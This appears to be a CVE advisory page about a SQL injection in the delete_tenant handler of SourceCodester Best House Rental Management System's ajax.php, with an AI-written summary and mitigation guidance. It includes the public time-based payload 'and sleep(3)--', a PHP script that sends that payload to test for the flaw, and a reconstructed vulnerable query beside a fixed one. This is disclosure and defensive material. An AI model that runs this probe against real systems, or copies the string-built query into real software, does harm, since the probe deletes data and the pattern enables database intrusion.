SourceCodester Best House Rental Management System ajax.php delete_tenant sql injection
Description
A vulnerability was found in SourceCodester Best House Rental Management System 1.0 and classified as critical. Affected by this issue is the function delete_tenant of the file /ajax.php?action=delete_tenant. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SourceCodester Best House Rental Management System 1.0 is vulnerable to SQL injection via the `id` POST parameter handled by the `delete_tenant` action of `/ajax.php`, allowing a remote attacker to execute arbitrary SQL statements against the application's database.
Vulnerability
A critical SQL injection vulnerability exists in SourceCodester Best House Rental Management System version 1.0. The flaw is in the delete_tenant action of /ajax.php, reached as /ajax.php?action=delete_tenant. The application places the id POST parameter into a SQL statement without validation or parameter binding, so an attacker controls part of the query text and can append arbitrary SQL. The endpoint is reachable over the network; the public PoC request carries a session cookie, and the VulDB entry is tagged permissions-required, so whether a valid session is needed to reach the handler has not been confirmed by the sources [1].
Exploitation
An attacker exploits the flaw by sending a POST request to /ajax.php?action=delete_tenant whose id parameter carries SQL. The public proof of concept appends and sleep(3)--+ to a legitimate id value; after URL decoding, the trailing + becomes the space that MySQL's -- comment syntax requires, so the rest of the original statement is commented out and the server pauses for roughly three seconds, which confirms that the injected text is executed as SQL. Two caveats for anyone reproducing this: because the payload uses and, sleep() is only evaluated when the id matches a row, and the handler is a delete, so a successful probe removes that tenant record; and the PoC was captured with a session cookie while the VulDB entry is tagged permissions-required, so send the request with a valid session unless you have verified that the handler is reachable without one. No user interaction is required [1].
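The timing check below is an added example, not code from the advisory or from the project. It sends the published payload shape to an instance you are authorised to test and reports whether the sleep(3) variant is measurably slower than a baseline request. The target URL, the cookie value, and the tenant id passed on the command line are placeholders; because the PoC payload uses and, the delay only appears when the id matches a row, and that row is deleted, so point it at a throwaway tenant record.

```php
<?php
// Added example, not part of the advisory or the project. A timing check for
// the published payload shape, to be run only against an instance you are
// authorised to test. TARGET, COOKIE and the tenant id are placeholders.
// Because the payload uses "and", sleep(3) is only evaluated when the id
// matches a row, and the handler deletes that row: use a throwaway tenant
// created for the test.

const TARGET = 'http://127.0.0.1/house_rental/ajax.php?action=delete_tenant'; // assumed path
const COOKIE = 'PHPSESSID=replace-with-a-valid-session';                     // PoC carried a session cookie
const DELAY  = 3;                                                            // seconds, as in the PoC

// POST id to the handler and return elapsed wall-clock seconds (null on transport error).
function timed_post(string $id): ?float
{
    $ch = curl_init(TARGET);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        // http_build_query encodes the trailing space of "-- " as "+", giving "--+" as in the PoC.
        CURLOPT_POSTFIELDS     => http_build_query(['id' => $id]),
        CURLOPT_COOKIE         => COOKIE,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => DELAY * 4,
    ]);
    $start   = microtime(true);
    $ok      = curl_exec($ch) !== false;
    $elapsed = microtime(true) - $start;
    curl_close($ch);
    return $ok ? $elapsed : null;
}

// Baseline with an id that matches nothing (no delete, no sleep), then the probe
// id with the PoC suffix. A gap close to DELAY means the injected SQL was executed.
function looks_injectable(string $probeId, string $missingId = '0'): bool
{
    $base = timed_post($missingId);
    $slow = timed_post($probeId . ' and sleep(' . DELAY . ')-- ');
    if ($base === null || $slow === null) {
        return false; // transport failure, not evidence either way
    }
    return ($slow - $base) >= DELAY * 0.8;
}

$probe = $argv[1] ?? null;
if ($probe === null) {
    fwrite(STDERR, "usage: php check.php <throwaway-tenant-id>\n");
    exit(2);
}
echo looks_injectable($probe) ? "delay observed: injection likely\n" : "no delay observed\n";
```

The 0.8 factor absorbs network jitter; if the baseline itself is slow or the first request hits a cold session, run the pair twice and require both to agree before drawing a conclusion.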
Impact
Successful exploitation lets an attacker read, modify, or delete arbitrary data in the application's database, compromising the confidentiality, integrity, and availability of the stored records, including tenant and user account data. Recovered credentials or password hashes may allow escalation to an administrative account, and the same injection point can be turned from a timing probe into data exfiltration with standard blind SQL injection techniques. The sources give no CVSS score but rate the issue critical, consistent with a remote path to full control of the application's database [1].
Mitigation
As of the publication date (2024-10-24), no official patch or fixed version has been released by SourceCodester, and the vendor's product page (sourcecodester.com) carries no advisory [2]. Because the application ships as PHP source, operators should patch it themselves: validate that id is an integer and pass it to the database through a prepared statement with a bound parameter rather than string concatenation, and require an authenticated, authorised session before any delete action runs. Review the other actions in ajax.php for the same pattern while doing so. Until patched, keep the application off the public internet. The vulnerability is not currently listed on the CISA Known Exploited Vulnerabilities (KEV) catalog.
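The following is an added example, not SourceCodester's code: a reconstruction of the string-built-query pattern the advisory describes, placed beside a hardened delete_tenant handler that applies the mitigation above. The table name tenants, the session key login_id, and the mysqli connection $conn are assumptions.

```php
<?php
// Added example, not SourceCodester's code. The vulnerable function is a
// reconstruction of the string-built-query pattern the advisory describes;
// the real file is not reproduced here. The table name "tenants", the
// session key "login_id" and the mysqli connection $conn are assumptions.

// Vulnerable pattern: $_POST['id'] is dropped straight into the statement.
// With id = "1 and sleep(3)-- " the text sent to MySQL is
//   DELETE FROM tenants WHERE id = 1 and sleep(3)--
// so the server pauses for three seconds, which is what the public PoC observes.
function delete_tenant_vulnerable(mysqli $conn): bool
{
    $id = $_POST['id'];
    return (bool) $conn->query("DELETE FROM tenants WHERE id = {$id}");
}

// Hardened handler: authorise, validate the type, then bind the value.
// Returns the number of deleted rows (0 when the request is rejected).
function delete_tenant_fixed(mysqli $conn): int
{
    // Destructive actions require a logged-in user; the session key is assumed.
    if (session_status() !== PHP_SESSION_ACTIVE || empty($_SESSION['login_id'])) {
        http_response_code(401);
        return 0;
    }

    // Tenant ids are positive integers; anything else (including the PoC
    // payload, an empty value, or an array) is rejected before it reaches SQL.
    $id = filter_var($_POST['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return 0;
    }

    // Prepared statement: the placeholder is bound as an integer, so the
    // value is always data and never part of the SQL text.
    $stmt = $conn->prepare('DELETE FROM tenants WHERE id = ?');
    if ($stmt === false) {
        http_response_code(500);
        return 0;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();
    return $deleted;
}
```

The integer validation alone would stop this particular payload, but the prepared statement is what makes the handler safe regardless of how the id is later used; keep both, and apply the same shape to every other action dispatched from ajax.php.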
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: = 1.0
- Range: 1.0
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- github.com/will121351/wenqin.webray.com.cn/blob/main/CVE-project/house-rentalmanagement-system1.md (mitre: exploit)
- vuldb.com (mitre: third-party-advisory)
- vuldb.com (mitre: signature, permissions-required)
- vuldb.com (mitre: vdb-entry, technical-description)
- www.sourcecodester.com (mitre: product)
News mentions
No linked articles in our index yet.